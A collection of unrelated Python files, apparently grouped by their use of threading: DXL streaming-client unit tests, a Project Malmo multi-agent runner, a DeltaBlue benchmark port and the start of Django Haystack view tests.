s += ',' + str(sensors['Battery Level'])
s += ',' + str(sensors['Steps'])
s += ',' + str(sensors['RSSI'])
thread = threading.Thread(target=send_udp, args=([s]))
thread.start()
|
test_channel.py
|
from __future__ import absolute_import
import unittest
import base64
import json
import threading
import time
from mock import call, patch, MagicMock
from dxlstreamingclient.channel import \
(ConsumerError, Channel, ChannelAuth, _PRODUCE_CONTENT_TYPE)
from dxlstreamingclient.error import TemporaryError
def create_record(topic, payload, partition, offset):
return {
"routingData": {
"topic": topic
},
"message": {
"payload": base64.b64encode(json.dumps(payload).encode()).decode()
},
"partition": partition,
"offset": offset
}
def create_records(records):
return {"records": records}
class Test(unittest.TestCase):
def setUp(self):
self.url = "http://localhost"
self.username = "someone"
self.password = "password"
self.consumer_group = "a_consumer_group"
def tearDown(self):
pass
def test_retry_condition(self):
auth = ChannelAuth(self.url, self.username, self.password)
with patch("requests.Session"):
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group)
self.assertFalse(channel._retry_if_not_consumer_error(
ConsumerError()))
self.assertTrue(channel._retry_if_not_consumer_error(Exception()))
def test_channel_auth(self):
auth = ChannelAuth(self.url, self.username, self.password)
req = MagicMock()
req.headers = {}
with patch("requests.get") as req_get:
req_get.return_value = MagicMock()
req_get.return_value.status_code = 200
original_token = "1234567890"
req_get.return_value.json = MagicMock(
return_value={"AuthorizationToken": original_token})
req = auth(req)
self.assertIsNotNone(req)
self.assertEqual(req.headers["Authorization"],
"Bearer {}".format(original_token))
new_token = "ABCDEFGHIJ"
req_get.return_value.json = MagicMock(
return_value={"AuthorizationToken": new_token})
# Even though the token that would be returned for a login attempt
# has changed, the original token should be returned because it
# was cached on the auth object.
req = auth(req)
self.assertIsNotNone(req)
self.assertEqual(req.headers["Authorization"],
"Bearer {}".format(original_token))
res = MagicMock()
res.status_code = 403
res.request.headers = {}
with patch("requests.Session") as session:
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group)
create_403_mock = MagicMock()
create_403_mock.status_code = 403
create_200_mock = MagicMock()
create_200_mock.status_code = 200
create_200_mock.json = MagicMock(
return_value={"consumerInstanceId": 1234},
)
self.assertIsNone(channel._consumer_id)
self.assertEqual(auth._token, original_token)
session.return_value.request.side_effect = [
create_403_mock, create_200_mock
]
channel.create()
self.assertEqual(channel._consumer_id, 1234)
# The 403 returned from the channel create call above should
# lead to a new token being issued for the next authentication
# call.
req = auth(req)
self.assertIsNotNone(req)
self.assertEqual(req.headers["Authorization"],
"Bearer {}".format(new_token))
self.assertEqual(auth._token, new_token)
def test_main(self):
auth = ChannelAuth(self.url, self.username, self.password)
case_event = {
"id": "a45a03de-5c3d-452a-8a37-f68be954e784",
"entity": "case",
"type": "creation",
"tenant-id": "7af4746a-63be-45d8-9fb5-5f58bf909c25",
"user": "johndoe",
"origin": "",
"nature": "",
"timestamp": "",
"transaction-id": "",
"case":
{
"id": "c00547df-6d74-4833-95ad-3a377c7274a6",
"name": "A great case full of malware",
"url": "https://mycaseserver.com/#/cases"
"/4e8e23f4-9fe9-4215-92c9-12c9672be9f1",
"priority": "Low"
}
}
with patch("requests.Session") as session:
session.return_value = MagicMock() # self._session
session.return_value.request = MagicMock()
create_mock = MagicMock()
create_mock.status_code = 200
create_mock.json = MagicMock(
return_value={"consumerInstanceId": 1234})
subscr_mock = MagicMock()
subscr_mock.status_code = 204
consum_mock = MagicMock()
consum_mock.status_code = 200
consum_mock.json = MagicMock(
return_value=create_records([
create_record("foo-topic", case_event,
partition=1, offset=1)
]))
commit_consumer_error_mock = MagicMock()
commit_consumer_error_mock.status_code = 404
commit_error_mock = MagicMock()
commit_error_mock.status_code = 500
commit_mock = MagicMock()
commit_mock.status_code = 204
produce_mock = MagicMock()
produce_mock.status_code = 204
delete_mock = MagicMock()
delete_mock.status_code = 204
delete_404_mock = MagicMock()
delete_404_mock.status_code = 404
delete_500_mock = MagicMock()
delete_500_mock.status_code = 500
session.return_value.request.side_effect = [
create_mock, subscr_mock,
consum_mock, commit_consumer_error_mock,
commit_error_mock, commit_mock,
produce_mock,
delete_500_mock, delete_404_mock, delete_mock
]
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
retry_on_fail=False,
verify_cert_bundle="cabundle.crt",
request_timeout=70,
session_timeout=60,
offset="earliest",
extra_configs={
"enable.auto.commit": "true",
"one.extra.setting": "one extra value",
"another.extra.setting": 42
})
self.assertEqual(channel._session.verify, "cabundle.crt")
channel.commit() # forcing early exit due to no records to commit
channel.create()
session.return_value.request.assert_called_with(
"post",
"http://localhost/databus/consumer-service/v1/consumers",
json={
"consumerGroup": self.consumer_group,
"configs": {
"request.timeout.ms": "70000",
"session.timeout.ms": "60000",
"enable.auto.commit": "true",
"auto.offset.reset": "earliest",
"one.extra.setting": "one extra value",
"another.extra.setting": 42
}
}
)
channel.subscribe(["topic1", "topic2"])
session.return_value.request.assert_called_with(
"post",
"http://localhost/databus/consumer-service/v1/consumers/1234/subscription",
json={"topics": ["topic1", "topic2"]}
)
records = channel.consume()
self.assertEqual(records[0]["id"],
"a45a03de-5c3d-452a-8a37-f68be954e784")
with self.assertRaises(ConsumerError):
channel.commit()
with self.assertRaises(TemporaryError):
channel.commit()
channel.commit()
message_payload = {"detail": "Hello from OpenDXL"}
produce_payload = {
"records": [
{
"routingData": {
"topic": "topic1",
"shardingKey": ""
},
"message": {
"headers": {},
"payload": base64.b64encode(
json.dumps(message_payload).encode()).decode()
}
}
]
}
channel.produce(produce_payload)
session.return_value.request.assert_called_with(
"post",
"http://localhost/databus/cloudproxy/v1/produce",
json=produce_payload,
headers={
"Content-Type": _PRODUCE_CONTENT_TYPE
}
)
with self.assertRaises(TemporaryError):
channel.delete() # trigger 500
session.return_value.request.assert_called_with(
"delete",
"http://localhost/databus/consumer-service/v1/consumers/1234")
session.return_value.request.reset_mock()
channel.delete() # trigger silent 404
session.return_value.request.assert_called_with(
"delete",
"http://localhost/databus/consumer-service/v1/consumers/1234")
session.return_value.request.reset_mock()
channel._consumer_id = "1234" # resetting consumer
channel.delete() # Proper deletion
session.return_value.request.assert_called_with(
"delete",
"http://localhost/databus/consumer-service/v1/consumers/1234")
session.return_value.request.reset_mock()
channel.delete() # trigger early exit
def test_path_prefix(self):
auth = ChannelAuth(self.url, self.username, self.password)
with patch("requests.Session") as session:
session.return_value = MagicMock() # self._session
session.return_value.request = MagicMock()
create_mock = MagicMock()
create_mock.status_code = 200
create_mock.json = MagicMock(
return_value={"consumerInstanceId": 1234})
produce_mock = MagicMock()
produce_mock.status_code = 204
session.return_value.request.side_effect = [
create_mock, produce_mock]
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
path_prefix="/base-path",
retry_on_fail=False)
channel.create()
session.return_value.request.assert_called_with(
"post",
"http://localhost/base-path/consumers",
json={"consumerGroup": self.consumer_group,
"configs": {
"auto.offset.reset": "latest",
"enable.auto.commit": "false"
}}
)
channel.produce({})
session.return_value.request.assert_called_with(
"post",
"http://localhost/base-path/produce",
json={},
headers={"Content-Type": _PRODUCE_CONTENT_TYPE}
)
session.return_value.request.reset_mock()
session.return_value.request.side_effect = [
create_mock, produce_mock]
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
consumer_path_prefix="/custom-consumer-path",
producer_path_prefix="/custom-producer-path",
retry_on_fail=False)
channel.create()
session.return_value.request.assert_called_with(
"post",
"http://localhost/custom-consumer-path/consumers",
json={"consumerGroup": self.consumer_group,
"configs": {
"auto.offset.reset": "latest",
"enable.auto.commit": "false"
}}
)
channel.produce({})
session.return_value.request.assert_called_with(
"post",
"http://localhost/custom-producer-path/produce",
json={},
headers={"Content-Type": _PRODUCE_CONTENT_TYPE}
)
def test_run(self):
auth = ChannelAuth(self.url, self.username, self.password)
record_1_payload = {"testing": "record_1"}
record_2_payload = {"testing": "record_2"}
record_1 = create_record("topic1", record_1_payload,
partition=1, offset=1)
record_2 = create_record("topic2", record_2_payload,
partition=1, offset=2)
first_records_group = create_records([record_1, record_2])
record_3_payload = {"testing": "record_3"}
record_3 = create_record("topic3", record_3_payload,
partition=2, offset=3)
second_records_group = create_records([record_3])
third_records_group = create_records([])
expected_payloads_received = [
[record_1_payload, record_2_payload],
[record_3_payload],
[]
]
expected_calls = [
call("post",
"http://localhost/databus/consumer-service/v1/consumers",
json={
"consumerGroup": self.consumer_group,
"configs": {
"auto.offset.reset": "latest",
"enable.auto.commit": "false"}}),
call("post",
"http://localhost/databus/consumer-service/v1/consumers/1234/subscription",
json={"topics": ["topic1", "topic2", "topic3"]}),
call("get",
"http://localhost/databus/consumer-service/v1/consumers/1234/records"),
call("post",
"http://localhost/databus/consumer-service/v1/consumers/1234/offsets",
json={
"offsets": [
{"topic": "topic1", "partition": 1, "offset": 1},
{"topic": "topic2", "partition": 1, "offset": 2}
]}),
call("get",
"http://localhost/databus/consumer-service/v1/consumers/1234/records"),
call("post",
"http://localhost/databus/consumer-service/v1/consumers/1234/offsets",
json={
"offsets": [
{"topic": "topic3", "partition": 2, "offset": 3}
]}),
call("get",
"http://localhost/databus/consumer-service/v1/consumers/1234/records"),
call("post",
"http://localhost/databus/consumer-service/v1/consumers",
json={
"consumerGroup": self.consumer_group,
"configs": {
"auto.offset.reset": "latest",
"enable.auto.commit": "false"}}),
call("post",
"http://localhost/databus/consumer-service/v1/consumers/5678/subscription",
json={"topics": ["topic1", "topic2", "topic3"]}),
call("get",
"http://localhost/databus/consumer-service/v1/consumers/5678/records")
]
with patch("requests.Session") as session:
session.return_value = MagicMock() # self._session
session.return_value.request = MagicMock()
create_consumer_1_mock = MagicMock()
create_consumer_1_mock.status_code = 200
create_consumer_1_mock.json = MagicMock(
return_value={"consumerInstanceId": 1234})
subscr_mock = MagicMock()
subscr_mock.status_code = 204
consume_1_mock = MagicMock()
consume_1_mock.status_code = 200
consume_1_mock.json = MagicMock(
return_value=first_records_group)
consume_2_mock = MagicMock()
consume_2_mock.status_code = 200
consume_2_mock.json = MagicMock(
return_value=second_records_group)
consume_not_found_mock = MagicMock()
consume_not_found_mock.status_code = 404
create_consumer_2_mock = MagicMock()
create_consumer_2_mock.status_code = 200
create_consumer_2_mock.json = MagicMock(
return_value={"consumerInstanceId": 5678})
consume_3_mock = MagicMock()
consume_3_mock.status_code = 200
consume_3_mock.json = MagicMock(
return_value=third_records_group)
commit_mock = MagicMock()
commit_mock.status_code = 204
session.return_value.request.side_effect = [
create_consumer_1_mock, subscr_mock,
consume_1_mock, commit_mock,
consume_2_mock, commit_mock,
consume_not_found_mock,
create_consumer_2_mock, subscr_mock,
consume_3_mock, commit_mock]
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
retry_on_fail=True)
payloads_received = []
def on_consume(payloads):
payloads_received.append(payloads)
# Return True (continue consuming) only if at least one
# payload dictionary was supplied in the payloads parameter.
# Return False to terminate the run call
# when no additional payloads are available to consume.
return len(payloads) > 0
session.return_value.request.reset_mock()
channel.run(on_consume, wait_between_queries=0,
topics=["topic1", "topic2", "topic3"])
session.return_value.request.assert_has_calls(expected_calls)
self.assertEqual(payloads_received, expected_payloads_received)
self.assertEqual(len(payloads_received), 3)
def test_stop(self):
auth = ChannelAuth(self.url, self.username, self.password)
with patch("requests.Session") as session:
session.return_value = MagicMock() # self._session
session.return_value.request = MagicMock()
def on_request(method, url,
json=None): # pylint: disable=redefined-outer-name
del method, json
response_json = {}
if url.endswith('/consumers'):
response_json = {"consumerInstanceId": 1234}
elif url.endswith('/records'):
response_json = {"records": []}
response_mock = MagicMock()
response_mock.status_code = 200
response_mock.json = MagicMock(return_value=response_json)
return response_mock
session.return_value.request.side_effect = on_request
channel = Channel(self.url,
auth=auth,
consumer_group=self.consumer_group,
retry_on_fail=False)
def on_consume(_):
return True
run_stopped = [False]
def run_worker():
channel.run(on_consume, wait_between_queries=30,
topics=["topic1", "topic2", "topic3"])
run_stopped[0] = True
thread = threading.Thread(target=run_worker)
thread.daemon = True
thread.start()
# Wait for the channel create, subscribe, and first consume
# (records) call to be made
while len(session.return_value.request.mock_calls) < 3:
time.sleep(0.1)
self.assertFalse(run_stopped[0])
channel.stop()
thread.join()
self.assertTrue(run_stopped[0])
session.return_value.request.assert_any_call(
"post",
"http://localhost/databus/consumer-service/v1/consumers/1234/subscription",
json={"topics": ["topic1", "topic2", "topic3"]}
)
|
runmultiagent.py
|
# ------------------------------------------------------------------------------------------------
# Copyright (c) 2018 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ------------------------------------------------------------------------------------------------
import malmoenv
import argparse
from pathlib import Path
import time
from lxml import etree
from threading import Thread
import threading
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='malmovnv test')
parser.add_argument('--mission', type=str, default='missions/mobchase_single_agent.xml', help='the mission xml')
parser.add_argument('--port', type=int, default=9000, help='the mission server port')
parser.add_argument('--server', type=str, default='127.0.0.1', help='the mission server DNS or IP address')
parser.add_argument('--server2', type=str, default=None, help="(Multi-agent) role N's server DNS or IP")
parser.add_argument('--port2', type=int, default=9000, help="(Multi-agent) role N's mission port")
parser.add_argument('--episodes', type=int, default=1, help='the number of resets to perform - default is 1')
parser.add_argument('--episode', type=int, default=0, help='the start episode - default is 0')
parser.add_argument('--resync', type=int, default=0, help='exit and re-sync on every N - default 0 meaning never')
parser.add_argument('--experimentUniqueId', type=str, default='test1', help="the experiment's unique id.")
args = parser.parse_args()
if args.server2 is None:
args.server2 = args.server
xml = Path(args.mission).read_text()
mission = etree.fromstring(xml)
number_of_agents = len(mission.findall('{http://ProjectMalmo.microsoft.com}AgentSection'))
print("number of agents: " + str(number_of_agents))
def run(role):
env = malmoenv.make()
env.init(xml,
args.port, server=args.server,
server2=args.server2, port2=(args.port + role),
role=role,
exp_uid=args.experimentUniqueId,
episode=args.episode, resync=args.resync)
def log(message):
print('[' + str(role) + '] ' + message)
for r in range(args.episodes):
log("reset " + str(r))
env.reset()
steps = 0
done = False
while not done:
steps += 1
action = env.action_space.sample()
log(str(steps) + " action: " + str(action))
obs, reward, done, info = env.step(action)
# log("reward: " + str(reward))
# log("done: " + str(done))
# log("info: " + str(info))
# log(" obs: " + str(obs))
time.sleep(.05)
env.close()
threads = [Thread(target=run, args=(i,)) for i in range(number_of_agents)]
[t.start() for t in threads]
[t.join() for t in threads]
|
bm_deltablue.py
|
"""
deltablue.py
============
Ported for the PyPy project.
Contributed by Daniel Lindsley
This implementation of the DeltaBlue benchmark was directly ported
from the `V8's source code`_, which was in turn derived
from the Smalltalk implementation by John Maloney and Mario
Wolczko. The original Javascript implementation was licensed under the GPL.
It's been updated in places to be more idiomatic to Python (for loops over
collections, a couple magic methods, ``OrderedCollection`` being a list & things
altering those collections changed to the builtin methods) but largely retains
the layout & logic from the original. (Ugh.)
.. _`V8's source code`: (https://github.com/v8/v8/blob/master/benchmarks/deltablue.js)
"""
from __future__ import print_function
from mpkmemalloc import *
import os
import gc
import threading
import psutil
import pyperf
# The JS variant implements "OrderedCollection", which basically completely
# overlaps with ``list``. So we'll cheat. :D
class OrderedCollection(list):
pass
class Strength(object):
REQUIRED = None
STRONG_PREFERRED = None
PREFERRED = None
STRONG_DEFAULT = None
NORMAL = None
WEAK_DEFAULT = None
WEAKEST = None
def __init__(self, strength, name):
super(Strength, self).__init__()
self.strength = strength
self.name = name
@classmethod
def stronger(cls, s1, s2):
return s1.strength < s2.strength
@classmethod
def weaker(cls, s1, s2):
return s1.strength > s2.strength
@classmethod
def weakest_of(cls, s1, s2):
if cls.weaker(s1, s2):
return s1
return s2
@classmethod
def strongest(cls, s1, s2):
if cls.stronger(s1, s2):
return s1
return s2
def next_weaker(self):
strengths = {
0: self.__class__.WEAKEST,
1: self.__class__.WEAK_DEFAULT,
2: self.__class__.NORMAL,
3: self.__class__.STRONG_DEFAULT,
4: self.__class__.PREFERRED,
# TODO: This looks like a bug in the original code. Shouldn't this be
# ``STRONG_PREFERRED? Keeping for porting sake...
5: self.__class__.REQUIRED,
}
return strengths[self.strength]
# This is a terrible pattern IMO, but true to the original JS implementation.
Strength.REQUIRED = Strength(0, "required")
Strength.STRONG_PREFERRED = Strength(1, "strongPreferred")
Strength.PREFERRED = Strength(2, "preferred")
Strength.STRONG_DEFAULT = Strength(3, "strongDefault")
Strength.NORMAL = Strength(4, "normal")
Strength.WEAK_DEFAULT = Strength(5, "weakDefault")
Strength.WEAKEST = Strength(6, "weakest")
class Constraint(object):
def __init__(self, strength):
super(Constraint, self).__init__()
self.strength = strength
def add_constraint(self):
global planner
self.add_to_graph()
planner.incremental_add(self)
def satisfy(self, mark):
global planner
self.choose_method(mark)
if not self.is_satisfied():
if self.strength == Strength.REQUIRED:
print('Could not satisfy a required constraint!')
return None
self.mark_inputs(mark)
out = self.output()
overridden = out.determined_by
if overridden is not None:
overridden.mark_unsatisfied()
out.determined_by = self
if not planner.add_propagate(self, mark):
print('Cycle encountered')
out.mark = mark
return overridden
def destroy_constraint(self):
global planner
if self.is_satisfied():
planner.incremental_remove(self)
else:
self.remove_from_graph()
def is_input(self):
return False
class UrnaryConstraint(Constraint):
def __init__(self, v, strength):
super(UrnaryConstraint, self).__init__(strength)
self.my_output = v
self.satisfied = False
self.add_constraint()
def add_to_graph(self):
self.my_output.add_constraint(self)
self.satisfied = False
def choose_method(self, mark):
if self.my_output.mark != mark and \
Strength.stronger(self.strength, self.my_output.walk_strength):
self.satisfied = True
else:
self.satisfied = False
def is_satisfied(self):
return self.satisfied
def mark_inputs(self, mark):
# No-ops.
pass
def output(self):
# Ugh. Keeping it for consistency with the original. So much for
# "we're all adults here"...
return self.my_output
def recalculate(self):
self.my_output.walk_strength = self.strength
self.my_output.stay = not self.is_input()
if self.my_output.stay:
self.execute()
def mark_unsatisfied(self):
self.satisfied = False
def inputs_known(self, mark):
return True
def remove_from_graph(self):
if self.my_output is not None:
self.my_output.remove_constraint(self)
self.satisfied = False
class StayConstraint(UrnaryConstraint):
def __init__(self, v, string):
super(StayConstraint, self).__init__(v, string)
def execute(self):
# The methods, THEY DO NOTHING.
pass
class EditConstraint(UrnaryConstraint):
def __init__(self, v, string):
super(EditConstraint, self).__init__(v, string)
def is_input(self):
return True
def execute(self):
# This constraint also does nothing.
pass
class Direction(object):
# Hooray for things that ought to be structs!
NONE = 0
FORWARD = 1
BACKWARD = -1
class BinaryConstraint(Constraint):
def __init__(self, v1, v2, strength):
super(BinaryConstraint, self).__init__(strength)
self.v1 = v1
self.v2 = v2
self.direction = Direction.NONE
self.add_constraint()
def choose_method(self, mark):
if self.v1.mark == mark:
if self.v2.mark != mark and Strength.stronger(self.strength, self.v2.walk_strength):
self.direction = Direction.FORWARD
else:
self.direction = Direction.BACKWARD
if self.v2.mark == mark:
if self.v1.mark != mark and Strength.stronger(self.strength, self.v1.walk_strength):
self.direction = Direction.BACKWARD
else:
self.direction = Direction.NONE
if Strength.weaker(self.v1.walk_strength, self.v2.walk_strength):
if Strength.stronger(self.strength, self.v1.walk_strength):
self.direction = Direction.BACKWARD
else:
self.direction = Direction.NONE
else:
if Strength.stronger(self.strength, self.v2.walk_strength):
self.direction = Direction.FORWARD
else:
self.direction = Direction.BACKWARD
def add_to_graph(self):
self.v1.add_constraint(self)
self.v2.add_constraint(self)
self.direction = Direction.NONE
def is_satisfied(self):
return self.direction != Direction.NONE
def mark_inputs(self, mark):
self.input().mark = mark
def input(self):
if self.direction == Direction.FORWARD:
return self.v1
return self.v2
def output(self):
if self.direction == Direction.FORWARD:
return self.v2
return self.v1
def recalculate(self):
ihn = self.input()
out = self.output()
out.walk_strength = Strength.weakest_of(
self.strength, ihn.walk_strength)
out.stay = ihn.stay
if out.stay:
self.execute()
def mark_unsatisfied(self):
self.direction = Direction.NONE
def inputs_known(self, mark):
i = self.input()
return i.mark == mark or i.stay or i.determined_by is None
def remove_from_graph(self):
if self.v1 is not None:
self.v1.remove_constraint(self)
if self.v2 is not None:
self.v2.remove_constraint(self)
self.direction = Direction.NONE
class ScaleConstraint(BinaryConstraint):
def __init__(self, src, scale, offset, dest, strength):
self.direction = Direction.NONE
self.scale = scale
self.offset = offset
super(ScaleConstraint, self).__init__(src, dest, strength)
def add_to_graph(self):
super(ScaleConstraint, self).add_to_graph()
self.scale.add_constraint(self)
self.offset.add_constraint(self)
def remove_from_graph(self):
super(ScaleConstraint, self).remove_from_graph()
if self.scale is not None:
self.scale.remove_constraint(self)
if self.offset is not None:
self.offset.remove_constraint(self)
def mark_inputs(self, mark):
super(ScaleConstraint, self).mark_inputs(mark)
self.scale.mark = mark
self.offset.mark = mark
def execute(self):
if self.direction == Direction.FORWARD:
self.v2.value = self.v1.value * self.scale.value + self.offset.value
else:
self.v1.value = (
self.v2.value - self.offset.value) / self.scale.value
def recalculate(self):
ihn = self.input()
out = self.output()
out.walk_strength = Strength.weakest_of(
self.strength, ihn.walk_strength)
out.stay = ihn.stay and self.scale.stay and self.offset.stay
if out.stay:
self.execute()
class EqualityConstraint(BinaryConstraint):
def execute(self):
self.output().value = self.input().value
class Variable(object):
def __init__(self, name, initial_value=0):
super(Variable, self).__init__()
self.name = name
self.value = initial_value
self.constraints = OrderedCollection()
self.determined_by = None
self.mark = 0
self.walk_strength = Strength.WEAKEST
self.stay = True
def __repr__(self):
# To make debugging this beast from pdb easier...
return '<Variable: %s - %s>' % (
self.name,
self.value
)
def add_constraint(self, constraint):
self.constraints.append(constraint)
def remove_constraint(self, constraint):
self.constraints.remove(constraint)
if self.determined_by == constraint:
self.determined_by = None
class Planner(object):
def __init__(self):
super(Planner, self).__init__()
self.current_mark = 0
def incremental_add(self, constraint):
mark = self.new_mark()
overridden = constraint.satisfy(mark)
while overridden is not None:
overridden = overridden.satisfy(mark)
def incremental_remove(self, constraint):
out = constraint.output()
constraint.mark_unsatisfied()
constraint.remove_from_graph()
unsatisfied = self.remove_propagate_from(out)
strength = Strength.REQUIRED
# Do-while, the Python way.
repeat = True
while repeat:
for u in unsatisfied:
if u.strength == strength:
self.incremental_add(u)
strength = strength.next_weaker()
repeat = strength != Strength.WEAKEST
def new_mark(self):
self.current_mark += 1
return self.current_mark
def make_plan(self, sources):
mark = self.new_mark()
plan = Plan()
todo = sources
while len(todo):
c = todo.pop(0)
if c.output().mark != mark and c.inputs_known(mark):
plan.add_constraint(c)
c.output().mark = mark
self.add_constraints_consuming_to(c.output(), todo)
return plan
def extract_plan_from_constraints(self, constraints):
sources = OrderedCollection()
for c in constraints:
if c.is_input() and c.is_satisfied():
sources.append(c)
return self.make_plan(sources)
def add_propagate(self, c, mark):
todo = OrderedCollection()
todo.append(c)
while len(todo):
d = todo.pop(0)
if d.output().mark == mark:
self.incremental_remove(c)
return False
d.recalculate()
self.add_constraints_consuming_to(d.output(), todo)
return True
def remove_propagate_from(self, out):
out.determined_by = None
out.walk_strength = Strength.WEAKEST
out.stay = True
unsatisfied = OrderedCollection()
todo = OrderedCollection()
todo.append(out)
while len(todo):
v = todo.pop(0)
for c in v.constraints:
if not c.is_satisfied():
unsatisfied.append(c)
determining = v.determined_by
for c in v.constraints:
if c != determining and c.is_satisfied():
c.recalculate()
todo.append(c.output())
return unsatisfied
def add_constraints_consuming_to(self, v, coll):
determining = v.determined_by
cc = v.constraints
for c in cc:
if c != determining and c.is_satisfied():
# I guess we're just updating a reference (``coll``)? Seems
# inconsistent with the rest of the implementation, where they
# return the lists...
coll.append(c)
class Plan(object):
def __init__(self):
super(Plan, self).__init__()
self.v = OrderedCollection()
def add_constraint(self, c):
self.v.append(c)
def __len__(self):
return len(self.v)
def __getitem__(self, index):
return self.v[index]
def execute(self):
for c in self.v:
c.execute()
# Main
def chain_test(n):
"""
This is the standard DeltaBlue benchmark. A long chain of equality
constraints is constructed with a stay constraint on one end. An
edit constraint is then added to the opposite end and the time is
measured for adding and removing this constraint, and extracting
and executing a constraint satisfaction plan. There are two cases.
In case 1, the added constraint is stronger than the stay
constraint and values must propagate down the entire length of the
chain. In case 2, the added constraint is weaker than the stay
constraint so it cannot be accomodated. The cost in this case is,
of course, very low. Typical situations lie somewhere between these
two extremes.
"""
global planner
planner = Planner()
prev, first, last = None, None, None
# We need to go up to n inclusively.
for i in range(n + 1):
name = "v%s" % i
v = Variable(name)
if prev is not None:
EqualityConstraint(prev, v, Strength.REQUIRED)
if i == 0:
first = v
if i == n:
last = v
prev = v
StayConstraint(last, Strength.STRONG_DEFAULT)
edit = EditConstraint(first, Strength.PREFERRED)
edits = OrderedCollection()
edits.append(edit)
plan = planner.extract_plan_from_constraints(edits)
for i in range(100):
first.value = i
plan.execute()
if last.value != i:
print("Chain test failed.")
def projection_test(n):
"""
This test constructs a two sets of variables related to each
other by a simple linear transformation (scale and offset). The
time is measured to change a variable on either side of the
mapping and to change the scale and offset factors.
"""
global planner
planner = Planner()
scale = Variable("scale", 10)
offset = Variable("offset", 1000)
src = None
dests = OrderedCollection()
for i in range(n):
src = Variable("src%s" % i, i)
dst = Variable("dst%s" % i, i)
dests.append(dst)
StayConstraint(src, Strength.NORMAL)
ScaleConstraint(src, scale, offset, dst, Strength.REQUIRED)
change(src, 17)
if dst.value != 1170:
print("Projection 1 failed")
change(dst, 1050)
if src.value != 5:
print("Projection 2 failed")
change(scale, 5)
for i in range(n - 1):
if dests[i].value != (i * 5 + 1000):
print("Projection 3 failed")
change(offset, 2000)
for i in range(n - 1):
if dests[i].value != (i * 5 + 2000):
print("Projection 4 failed")
def change(v, new_value):
global planner
edit = EditConstraint(v, Strength.PREFERRED)
edits = OrderedCollection()
edits.append(edit)
plan = planner.extract_plan_from_constraints(edits)
for i in range(10):
v.value = new_value
plan.execute()
edit.destroy_constraint()
# HOORAY FOR GLOBALS... Oh wait.
# In spirit of the original, we'll keep it, but ugh.
planner = None
def delta_blue(n):
chain_test(n)
projection_test(n)
# if __name__ == "__main__":
def functionWorker(tname, allocate_pkey):
if allocate_pkey:
pkey_thread_mapper(tname)
runner = pyperf.Runner(loops=1)
runner.metadata['description'] = "DeltaBlue benchmark"
n = 100
runner.bench_func('deltablue', delta_blue, n)
del runner
pymem_reset()
def dummyFunc(name):
pass
def main(params):
pymem_setup_allocators(0)
gc.disable()
workers = len(params) if (len(params)>0) else 1
runner = pyperf.Runner(loops = 1)
runner.argparser.add_argument("--cases")
runner.bench_func("Dummy init", dummyFunc, "main")
del runner
threads = []
for i in range(workers):
tname = 'Worker' + str(i)
threads.append(threading.Thread(target=functionWorker, args=[tname,1], name=tname))
for idx, thread in enumerate(threads):
thread.start()
thread.join()
pymem_reset_pkru()
result = {}
for activation in params:
result[activation] = "Finished thread execution"
process = psutil.Process(os.getpid())
print((process.memory_info().rss)/1024) # in bytes
return(result)
# if __name__ == '__main__':
# out = main({'activation1':{},'activation3':{},'activation4':{}, 'activation2': {},
# 'activation31':{},'activation33':{},'activation34':{}, 'activation32': {},
# 'activation45':{},'activation46':{},'activation47':{}, 'activation48': {}})
# process = psutil.Process(os.getpid())
# print((process.memory_info().rss)/1024) # in bytes
|
test_views.py
|
# encoding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import time
from threading import Thread
from django import forms
from django.core.urlresolvers import reverse
from django.http import HttpRequest, QueryDict
from django.test import TestCase, override_settings
from django.utils.six.moves import queue
from test_haystack.core.models import AnotherMockModel, MockModel
from haystack import connections, indexes
from haystack.forms import FacetedSearchForm, ModelSearchForm, SearchForm
from haystack.query import EmptySearchQuerySet
from haystack.utils.loading import UnifiedIndex
from haystack.views import FacetedSearchView, SearchView, search_view_factory
class InitialedSearchForm(SearchForm):
q = forms.CharField(initial='Search for...', required=False, label='Search')
class BasicMockModelSearchIndex(indexes.BasicSearchIndex, indexes.Indexable):
def get_model(self):
return MockModel
class BasicAnotherMockModelSearchIndex(indexes.BasicSearchIndex, indexes.Indexable):
def get_model(self):
return AnotherMockModel
class SearchViewTestCase(TestCase):
fixtures = ['base_data']
def setUp(self):
super(SearchViewTestCase, self).setUp()
# Stow.
self.old_unified_index = connections['default']._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections['default']._index = self.ui
# Update the "index".
backend = connections['default'].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections['default']._index = self.old_unified_index
super(SearchViewTestCase, self).tearDown()
def test_search_no_query(self):
response = self.client.get(reverse('haystack_search'))
self.assertEqual(response.status_code, 200)
def test_search_query(self):
response = self.client.get(reverse('haystack_search'), {'q': 'haystack'})
self.assertEqual(response.status_code, 200)
self.assertIn('page', response.context)
self.assertNotIn('page_obj', response.context)
self.assertEqual(len(response.context[-1]['page'].object_list), 3)
self.assertEqual(response.context[-1]['page'].object_list[0].content_type(), u'core.mockmodel')
self.assertEqual(response.context[-1]['page'].object_list[0].pk, '1')
